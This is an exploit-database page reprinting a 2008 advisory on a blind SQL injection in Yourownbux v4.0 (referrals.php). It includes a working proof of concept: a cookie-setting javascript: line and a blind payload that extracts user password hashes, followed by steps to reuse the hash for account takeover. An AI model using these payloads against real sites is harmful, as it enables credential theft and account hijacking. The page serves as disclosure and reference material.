header-logo
Suggest Exploit
vendor:
Yourownbux
by:
Tec-n0x
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Yourownbux
Affected Version From: v4.0
Affected Version To: v4.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Yourownbux v4.0 Blind SQL Injection Vulnerability ( referrals.php )

Yourownbux v4.0 is vulnerable to Blind SQL Injection. An attacker can inject malicious SQL queries via the 'usNick' cookie parameter in the 'referrals.php' page. An attacker can use this vulnerability to extract sensitive information from the database such as user passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

________                                            ._.
\______ \_______  ____ ______  ______ ____   ____   | |
 |    |  \_  __ \/  _ \\____ \/  ___// __ \_/ ___\  | |
 |    `   \  | \(  <_> )  |_> >___ \\  ___/\  \___   \|
/_______  /__|   \____/|   __/____  >\___  >\___  >  __
        \/             |__|       \/     \/     \/   \/
.____          ___.           
|    |   _____ \_ |__   ______
|    |   \__  \ | __ \ /  ___/
|    |___ / __ \| \_\ \\___ \ 
|_______ (____  /___  /____  >
        \/    \/    \/     \/ 

---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]

-----[]===========[]=> Yourownbux v4.0 Blind SQL Injection Vulnerability ( referrals.php )

-----[]===========[]=> Discovered By: Tec-n0x 
		 	Contact: Tec-n0x <at> hotmail <dot> com

-----[]===========[]=> DropSec.com =~ Lab's ..!!

-----[]===========[]=> Gr33tz:
			Celciuz, MurdeR, OzX, N.O.X, JosS, DDoS && All Friends
			
			Special Gr33tz to: C1c4tr1Z ( http://lowsec.org )

---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]

		POC: 

	Go to => http://site.com/referrals.php 	( Logged in )
	javascript:document.cookie="usNick=' AND 1=0 /*; expires=Thu, 2 Aug 2020 20:45:20 UTC; path=/";

		=> Modify : ' AND 1=0 /* With Injection's.
				
		=> Example: ' AND ascii(substring((SELECT password FROM yob_users where id=1),1,1))=100 /*
		
		=> When You got the Hash ... Add the cookie usNick with the user [ Extract it with blind if you dont know ] 
		 and the SHA1 Hash ( Exploit is going to be available Next Week on DropSec.com ).

---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]
				

# milw0rm.com [2008-10-07]

Navigation

Suggest Exploit

Services By CQR